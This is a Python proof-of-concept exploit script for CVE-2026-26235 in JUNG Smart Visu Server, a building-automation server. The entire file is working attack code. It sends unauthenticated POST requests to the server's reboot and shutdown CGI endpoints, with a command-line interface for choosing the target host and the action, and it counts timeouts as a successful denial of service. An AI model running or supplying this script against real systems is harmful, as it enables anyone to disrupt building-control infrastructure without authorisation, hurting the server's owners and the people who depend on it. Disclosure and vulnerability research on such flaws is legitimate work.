#!/usr/bin/env python3
# Exploit Title: JUNG Smart Visu Server <= 1.1.1050- Unauthenticated Remote Reboot/Shutdown
# CVE: CVE-2026-26235
# Date: 2026-02-12
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/banyamer-security
# Vendor Homepage: https://www.jung.de
# Software Link: https://www.jung.de/smart-visu-server
# Vulnerable: JUNG Smart Visu Server <= 1.1.1050
# Tested on: JUNG Smart Visu Server 1.1.1050
# Category: Web Application
# Platform: Embedded/Linux
# Exploit Type: Missing Authentication (CWE-306)

import requests
import sys
import argparse
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def print_banner():
    print("\n" + "="*60)
    print(" JUNG Smart Visu Server - Unauthenticated Reboot/Shutdown PoC")
    print(" CVE-2026-26235 | CWE-306")
    print("="*60 + "\n")

def exploit(target, action="reboot", verify_ssl=False, timeout=10):
    endpoints = {
        "reboot": "/cgi-bin/reboot.sh",
        "shutdown": "/cgi-bin/shutdown.sh"
    }
    
    if action not in endpoints:
        print(f"[-] Invalid action: {action}. Choose 'reboot' or 'shutdown'.")
        return False
    
    url = f"{target.rstrip('/')}{endpoints[action]}"
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0",
        "Content-Type": "application/x-www-form-urlencoded",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Connection": "keep-alive",
        "Upgrade-Insecure-Requests": "1",
        "Sec-Fetch-Dest": "document",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Fetch-User": "?1",
        "Cache-Control": "max-age=0",
        "Origin": target.rstrip('/'),
        "Referer": f"{target.rstrip('/')}/",
        "DNT": "1",
        "Sec-GPC": "1"
    }
    
    print(f"[*] Target      : {url}")
    print(f"[*] Action      : {action.upper()}")
    print(f"[*] SSL Verify  : {verify_ssl}")
    print("[*] Sending unauthenticated POST request...\n")
    
    try:
        response = requests.post(
            url, 
            headers=headers,
            data="",  
            verify=verify_ssl,
            timeout=timeout,
            allow_redirects=False
        )
        
        print(f"[+] Request sent successfully!")
        print(f"[+] HTTP Status : {response.status_code}")
        
        if response.status_code == 200:
            print("[!] Server responded with 200 OK - action likely executed")
        elif response.status_code == 302 or response.status_code == 301:
            print("[!] Server responded with redirect - action may have been triggered")
        else:
            print(f"[?] Unexpected response code: {response.status_code}")
        
        if response.text:
            print(f"[*] Response preview: {response.text[:200].strip()}")
        
        print("\n[!] If successful, the target server should now be restarting or shutting down.")
        return True
        
    except requests.exceptions.Timeout:
        print("[-] Connection timeout. The server may be down or unreachable.")
        print("[*] This could indicate successful DoS if the server was previously reachable.")
        return True
    except requests.exceptions.ConnectionError as e:
        print(f"[-] Connection error: {e}")
        print("[*] The server may have gone down - possibly successful exploitation.")
        return True
    except Exception as e:
        print(f"[-] An error occurred: {e}")
        return False

def main():
    print_banner()
    
    parser = argparse.ArgumentParser(
        description="PoC for CVE-2026-26235 - JUNG Smart Visu Server Unauthenticated Reboot/Shutdown"
    )
    parser.add_argument(
        "target",
        help="Target server URL (e.g., https://192.168.1.100:8080)"
    )
    parser.add_argument(
        "-a", "--action",
        choices=["reboot", "shutdown"],
        default="reboot",
        help="Action to perform: reboot or shutdown (default: reboot)"
    )
    parser.add_argument(
        "-k", "--insecure",
        action="store_false",
        dest="verify_ssl",
        default=False,
        help="Disable SSL certificate verification (default: disabled)"
    )
    parser.add_argument(
        "-t", "--timeout",
        type=int,
        default=10,
        help="Request timeout in seconds (default: 10)"
    )
    
    args = parser.parse_args()
    
    print(f"[*] Starting exploit against: {args.target}\n")
    
    success = exploit(
        target=args.target,
        action=args.action,
        verify_ssl=args.verify_ssl,
        timeout=args.timeout
    )
    
    if success:
        print("\n[+] Exploit completed successfully.")
    else:
        print("\n[-] Exploit failed.")
        sys.exit(1)

if __name__ == "__main__":
    main()